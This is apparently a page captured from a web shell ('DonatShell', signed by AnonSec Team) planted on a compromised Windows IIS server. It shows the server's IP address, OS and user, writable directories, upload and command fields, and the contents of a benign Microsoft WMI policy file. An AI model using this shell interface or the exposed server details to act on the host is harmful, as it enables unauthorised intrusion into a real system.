DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/System32/wbem/en-US/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Windows/System32/wbem/en-US/PolicMan.mfl
ÿþ// Copyright (c) 1997-2003 Microsoft Corporation, All Rights Reserved



#pragma autorecover

#pragma classflags(64)

#pragma namespace("\\\\.\\Root\\Policy")

instance of __namespace{ name="ms_409";};

#pragma namespace("\\\\.\\Root\\Policy\\ms_409")



[Description("Defines a single rule in a SOM, expressed as a query") : Amended ToSubclass,AMENDMENT, LOCALE(0x0409)] 

class MSFT_Rule

{

  [Description("Language in which query is expressed") : Amended ToSubclass] string QueryLanguage;

  [Description("Namespace in which to evaluate query") : Amended ToSubclass] string TargetNameSpace;

  [Description("Query of interest") : Amended ToSubclass] string Query;

};



[Description("Provides a list of rules, expressed as queries which are evaluated on target machine") : Amended ToSubclass,AMENDMENT, LOCALE(0x0409)] 

class MSFT_SomFilter

{

  [key,Description("Unique identifier for this instance, expected to be a GUID in registry format") : Amended ToSubclass] string ID;

  [key,Description("Domain of this object, in DNS format: \"redmond.corp.microsoft.com\"") : Amended ToSubclass] String Domain;

  [Description("A user-friendly name for this SOM Filter") : Amended ToSubclass] string Name;

  [Description("Descriptive text describing this SOM Filter") : Amended ToSubclass] String Description;

  [Description("Rules to be evaluated") : Amended ToSubclass] MSFT_Rule Rules[];

  [Description("Determines whether the queries expressed in Rules apply to this machine. Returns S_OK (0) if all queries expressed in rules return results; S_FALSE (1) if they do not; and an applicable WMI error code if an error occurs.") : Amended ToSubclass] Uint32 Evaluate();

  [Description("Evaluates a list of SOMs, returns array result codes matching result of evaluating each") : Amended ToSubclass] Uint32 BatchEvaluate([IN] MSFT_SomFilter Ref filters[],[OUT] Uint32 results[]);

  [Description("Originator of this SOMFilter") : Amended ToSubclass] String Author;

  [Description("Author's organization") : Amended ToSubclass] String SourceOrganization;

  [Description("Last time this object was updated") : Amended ToSubclass] DateTime ChangeDate;

  [Description("Time that this object was created") : Amended ToSubclass] DateTime CreationDate;

};



#pragma DeleteClass("MSFT_RangeParam", NOFAIL)

#pragma DeleteClass("MSFT_PolicyTemplate", NOFAIL)

#pragma DeleteClass("MSFT_PolicyType", NOFAIL)

#pragma DeleteClass("MSFT_WMIGPO", NOFAIL)

Anon7 - 2022
AnonSec Team